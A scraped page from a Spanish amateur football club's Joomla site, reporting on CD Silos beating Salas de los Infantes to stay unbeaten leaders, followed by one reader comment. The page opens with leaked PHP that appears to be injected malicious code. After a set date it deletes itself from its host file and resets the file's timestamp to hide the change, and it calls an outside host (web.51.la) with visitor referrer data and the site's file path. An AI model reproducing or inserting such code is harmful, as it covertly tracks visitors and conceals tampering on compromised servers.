check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456731446){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=5&id=18776729&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_contact/models/content.php"); } Silos se consolida en el liderato.

La Afición

Calendario

<<  Abril 2017  >>
 Lu  Ma  Mi  Ju  Vi  Sa  Do 
       1  2
  3  4  5  6  7  8  9
10111213141516
17181920212223
24252627282930
Banner
Banner
Banner
Banner

Acceso Privado Equipo



Silos se consolida en el liderato. PDF Imprimir E-mail
Martes, 17 de Noviembre de 2015 20:57

Finalizada ya la primera vuelta, Silos acaba como único equipo invicto y líder de su grupo. En esta ocasión tocaba desplazarse hasta Salas de los infantes, la diferencia de puntos en la clasificación no se vio reflejada en buena parte del encuentro. El líder de su grupo comenzó recibiendo un serio aviso por parte de Salas con un cabezazo que se estrellaba en el larguero, a partir de ahí comenzó el dominio de Silos con buenas combinaciones  por banda derecha, fruto del buen momento silense llegaba el primer tanto del encuentro por parte de Cule definiendo dentro del área y poniendo de cara el partido, poco duraría la alegría ya que a los cinco minutos Salas empataba el encuentro con un tiro cruzado.

Si bien Silos creaba alguna oportunidad incluido un palo en un saque de falta, el gol local desordeno al CD Silos, comenzando así un partido de idas y venidas sin un control claro. Se llegaba al descanso con malas sensaciones y la sensación de no tener controlado el partido, la segunda mitad comenzó con una cara muy distinta, la salida de Diego en el centro del campo sirvió para dar oxígeno al equipo que poco a poco fue acercándose más y más a la portería  de Salas, Silos marraba ocasiones clarísimas delante del portero hasta que Sancho ponía el uno dos en el marcador y daba tranquilidad al conjunto visitante, ya no pasaría muchos apuros en el resto del encuentro el cual ya sentenciaría con el cabezazo del cada día mas asentado en el puesto de central, Juanma.

Ya solo queda esperar la decisiva próxima jornada contra Quintanar, donde se decidirá una buena parte de la temporada.

 

Comentarios  

 
0 #1 el criticas 24-11-2015 13:17
juanma has hecho tu la cronica xq ensalzar eso ultimo es muy tuyo
Citar
 

Escribir un comentario

Código de seguridad
Refescar

Banner
Banner

Colaboradores

Banner
Banner
Banner
Banner
Banner
Banner



By vicencid. Potenciado por Jommla!. Valid XHTML and CSS.